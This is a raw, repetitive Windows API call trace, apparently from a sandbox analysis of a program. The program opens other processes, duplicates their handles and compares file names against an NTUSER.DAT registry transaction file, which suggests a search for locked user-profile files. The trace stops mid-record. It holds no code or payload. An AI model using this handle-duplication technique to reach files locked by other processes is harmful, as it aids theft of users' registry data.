OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.545] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.545] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.545] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.547] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.547] CloseHandle (hObject=0x1e4) returned 1 [0164.547] CloseHandle (hObject=0x194) returned 1 [0164.547] CloseHandle (hObject=0x1e8) returned 1 [0164.547] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.547] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.547] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.547] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.552] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.552] CloseHandle (hObject=0x1e4) returned 1 [0164.552] CloseHandle (hObject=0x194) returned 1 [0164.552] CloseHandle (hObject=0x1e8) returned 1 [0164.552] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.552] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.552] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.553] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.554] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.554] CloseHandle (hObject=0x1e4) returned 1 [0164.554] CloseHandle (hObject=0x194) returned 1 [0164.554] CloseHandle (hObject=0x1e8) returned 1 [0164.554] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.554] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.554] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.555] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.556] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.556] CloseHandle (hObject=0x1e4) returned 1 [0164.556] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.556] CloseHandle (hObject=0x194) returned 1 [0164.556] CloseHandle (hObject=0x1e8) returned 1 [0164.556] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.556] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.556] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.557] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.558] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.558] CloseHandle (hObject=0x1e4) returned 1 [0164.558] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.558] CloseHandle (hObject=0x194) returned 1 [0164.558] CloseHandle (hObject=0x1e8) returned 1 [0164.558] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.558] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.558] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.559] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.560] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.560] CloseHandle (hObject=0x1e4) returned 1 [0164.560] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.560] CloseHandle (hObject=0x194) returned 1 [0164.560] CloseHandle (hObject=0x1e8) returned 1 [0164.560] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.561] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x268, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.561] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.561] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.562] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.562] CloseHandle (hObject=0x1e4) returned 1 [0164.562] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0164.562] CloseHandle (hObject=0x194) returned 1 [0164.562] CloseHandle (hObject=0x1e8) returned 1 [0164.562] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.562] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.563] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.563] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.564] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.564] CloseHandle (hObject=0x1e4) returned 1 [0164.564] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0164.564] CloseHandle (hObject=0x194) returned 1 [0164.565] CloseHandle (hObject=0x1e8) returned 1 [0164.565] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.565] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x274, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.565] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.566] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.566] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.567] CloseHandle (hObject=0x1e4) returned 1 [0164.567] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0164.567] CloseHandle (hObject=0x194) returned 1 [0164.567] CloseHandle (hObject=0x1e8) returned 1 [0164.567] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.567] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.567] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.568] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.568] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.568] CloseHandle (hObject=0x1e4) returned 1 [0164.569] CloseHandle (hObject=0x194) returned 1 [0164.569] CloseHandle (hObject=0x1e8) returned 1 [0164.569] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.569] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x454, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.569] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.569] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.570] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.570] CloseHandle (hObject=0x1e4) returned 1 [0164.570] CloseHandle (hObject=0x194) returned 1 [0164.571] CloseHandle (hObject=0x1e8) returned 1 [0164.571] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.571] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.571] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.572] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.572] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.573] CloseHandle (hObject=0x1e4) returned 1 [0164.573] CloseHandle (hObject=0x194) returned 1 [0164.573] CloseHandle (hObject=0x1e8) returned 1 [0164.573] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.573] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.573] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.574] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.574] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.574] CloseHandle (hObject=0x1e4) returned 1 [0164.575] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0164.575] CloseHandle (hObject=0x194) returned 1 [0164.575] CloseHandle (hObject=0x1e8) returned 1 [0164.575] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.575] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x570, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.575] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.576] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.577] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.577] CloseHandle (hObject=0x1e4) returned 1 [0164.577] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.577] CloseHandle (hObject=0x194) returned 1 [0164.577] CloseHandle (hObject=0x1e8) returned 1 [0164.577] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.577] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.577] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.577] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.578] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.578] CloseHandle (hObject=0x1e4) returned 1 [0164.578] _wcsicmp (_Str1="\\edb.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0164.578] CloseHandle (hObject=0x194) returned 1 [0164.578] CloseHandle (hObject=0x1e8) returned 1 [0164.578] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.579] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.579] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.579] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.580] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.580] CloseHandle (hObject=0x1e4) returned 1 [0164.580] _wcsicmp (_Str1="\\catdb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0164.580] CloseHandle (hObject=0x194) returned 1 [0164.580] CloseHandle (hObject=0x1e8) returned 1 [0164.580] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0164.580] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.581] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.581] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.582] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.582] CloseHandle (hObject=0x1e4) returned 1 [0164.582] _wcsicmp (_Str1="\\catdb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0164.582] CloseHandle (hObject=0x194) returned 1 [0164.582] CloseHandle (hObject=0x1e8) returned 1 [0164.583] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x444) returned 0x1e8 [0164.583] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.583] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.583] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.584] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.584] CloseHandle (hObject=0x1e4) returned 1 [0164.585] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.585] CloseHandle (hObject=0x194) returned 1 [0164.585] CloseHandle (hObject=0x1e8) returned 1 [0164.585] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.585] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.585] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.586] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.586] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.586] CloseHandle (hObject=0x1e4) returned 1 [0164.586] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.587] CloseHandle (hObject=0x194) returned 1 [0164.587] CloseHandle (hObject=0x1e8) returned 1 [0164.587] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.587] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.587] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.587] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.597] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.597] CloseHandle (hObject=0x1e4) returned 1 [0164.597] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.597] CloseHandle (hObject=0x194) returned 1 [0164.597] CloseHandle (hObject=0x1e8) returned 1 [0164.597] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.597] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.597] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.598] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.599] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.599] CloseHandle (hObject=0x1e4) returned 1 [0164.599] CloseHandle (hObject=0x194) returned 1 [0164.599] CloseHandle (hObject=0x1e8) returned 1 [0164.599] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.599] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.599] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.600] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.600] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.601] CloseHandle (hObject=0x1e4) returned 1 [0164.601] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.601] CloseHandle (hObject=0x194) returned 1 [0164.601] CloseHandle (hObject=0x1e8) returned 1 [0164.601] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.601] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x16c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.601] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.601] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.602] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.602] CloseHandle (hObject=0x1e4) returned 1 [0164.603] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.603] CloseHandle (hObject=0x194) returned 1 [0164.603] CloseHandle (hObject=0x1e8) returned 1 [0164.603] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.603] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.603] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.604] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.604] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.605] CloseHandle (hObject=0x1e4) returned 1 [0164.605] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.605] CloseHandle (hObject=0x194) returned 1 [0164.605] CloseHandle (hObject=0x1e8) returned 1 [0164.605] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.605] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.605] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.605] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.606] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.606] CloseHandle (hObject=0x1e4) returned 1 [0164.606] _wcsicmp (_Str1="\\amd64_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_0a1fd3a3a768b895", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.606] CloseHandle (hObject=0x194) returned 1 [0164.607] CloseHandle (hObject=0x1e8) returned 1 [0164.607] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.607] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x18c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, 